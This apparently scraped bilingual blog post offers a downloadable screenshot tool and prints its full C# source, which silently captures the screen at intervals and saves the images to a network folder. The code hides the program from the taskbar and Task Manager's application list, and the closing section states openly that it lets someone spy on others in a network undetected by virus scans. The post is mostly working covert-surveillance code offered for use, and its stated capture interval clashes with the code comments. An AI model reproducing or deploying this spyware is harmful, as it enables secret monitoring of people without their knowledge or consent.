- \n
- .NET Framework<\/li>\n
- Someone can execute the process on a netdrive \/ Jemand muss die Exe am Netzlaufwerk vorher starten<\/li>\n<\/ul>\n
Solution – L\u00f6sung<\/h1>\n
- \n
- Download and unpack the following tool on a netdrive: ScreenshotTool<\/a><\/li>\n
- Double click the process (this will not damage s.th. on the computer!!!)<\/li>\n
- The tool is producing a screenshot every minute in the folder it has been started in.<\/li>\n
- To stop the tool, rename close_.txt to close.txt (otherwise a restart of the computer will stop the process and there is nothing pointing to it).<\/li>\n<\/ul>\n
Fazit<\/h1>\n
On the screenshot you see the only hint to recognize the running tool. It is not shown in the Task Manager. Via Filesharing\/Samba it is possible to spy other persons in a network without getting discovered by virus scans.<\/p>\n
![\"taskmanager\"](\"https:\/\/i0.wp.com\/www.capri-soft.de\/blog\/wp-content\/uploads\/2016\/02\/taskmanager.png?resize=474%2C339&ssl=1\")
<\/a><\/h1>\n<\/p>\n
Code<\/h1>\n
\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.ComponentModel;\r\nusing System.Data;\r\nusing System.Drawing;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Windows.Forms;\r\nusing System.Drawing.Imaging;\r\nusing System.IO;\r\n\r\nnamespace screenshot\r\n{\r\n public partial class Form1 : Form\r\n {\r\n \/\/ Die Dateien werden im Pfad erzeugt, wo die Exe gestartet wird\r\n public string outputPath = Application.StartupPath;\r\n\r\n public Form1()\r\n {\r\n InitializeComponent();\r\n\r\n \/\/ Das Fenster bekommt keinen Border Style\r\n this.FormBorderStyle = FormBorderStyle.None;\r\n\r\n \/\/ Das Fenster wird nicht in der Task Bar angezeigt\r\n this.ShowInTaskbar = false;\r\n }\r\n\r\n \/\/ Entfernt das Programm aus dem Taskmanager -> Anwendungen\r\n protected override CreateParams CreateParams\r\n {\r\n get\r\n {\r\n var cp = base.CreateParams;\r\n cp.ExStyle |= 0x80; \/\/ Turn on WS_EX_TOOLWINDOW\r\n return cp;\r\n }\r\n }\r\n \r\n \/\/ Erzeuge einen Screenshot\r\n private void button1_Click(object sender, EventArgs e)\r\n {\r\n \/\/ Pr\u00fcfe ob eine close.txt existiert\r\n if (File.Exists(@"" + outputPath + "\\\\close.txt"))\r\n {\r\n this.Close();\r\n }\r\n\r\n\r\n \/\/ this.Opacity = 0.0; \/\/ Verstecken der Form vor dem Screencopy\r\n \r\n \/\/ Screencopy erstellen und in BildschirmBMP ablegen\r\n Screen Bildschirm = Screen.PrimaryScreen; \/\/ Hauptbildschirm\r\n \r\n using (Bitmap BildschirmBMP = new Bitmap(Bildschirm.Bounds.Width, \/\/ Ziel-Bitmap\r\n Bildschirm.Bounds.Height,\r\n PixelFormat.Format24bppRgb))\r\n {\r\n using (Graphics BildschirmGR = Graphics.FromImage(BildschirmBMP))\r\n {\r\n \/\/ Graphics erzeugen\r\n BildschirmGR.CopyFromScreen(Bildschirm.Bounds.X, \r\n Bildschirm.Bounds.Y, \/\/ Abbild erstellen \r\n 0, \r\n 0,\r\n BildschirmBMP.Size);\r\n }\r\n\r\n \/\/ this.Opacity = 1.0; \/\/ Wieder anzeigen der Form nach dem Screencopy\r\n\r\n \/\/ Screencopy speichern mit Datum ein Zeitstempel\r\n BildschirmBMP.Save(outputPath + @"\\output_" + DateTime.Now.Year + \r\n "-" + DateTime.Now.Month + "-" + DateTime.Now.Day + "__" + \r\n DateTime.Now.Hour + "_" + DateTime.Now.Minute + "_" + \r\n DateTime.Now.Second + ".png"); \/\/ Nur mal so zum speichern\r\n }\r\n\r\n }\r\n\r\n \/\/ Rufe jede Sekunde auf (Timer ist ein Toolbox Element)\r\n private void timer1_Tick(object sender, EventArgs e)\r\n {\r\n \/\/ Jede Sekunde ausf\u00fchren\r\n button1_Click(null, null);\r\n }\r\n\r\n \/\/ Sobald das Programm gestartet ist, starte den Timer\r\n private void Form1_Load(object sender, EventArgs e)\r\n {\r\n \/\/ Beim Start einmal ausf\u00fchren\r\n button1_Click(null, null);\r\n timer1.Start();\r\n }\r\n }\r\n}\r\n\r\n<\/pre>\n
- Download and unpack the following tool on a netdrive: ScreenshotTool<\/a><\/li>\n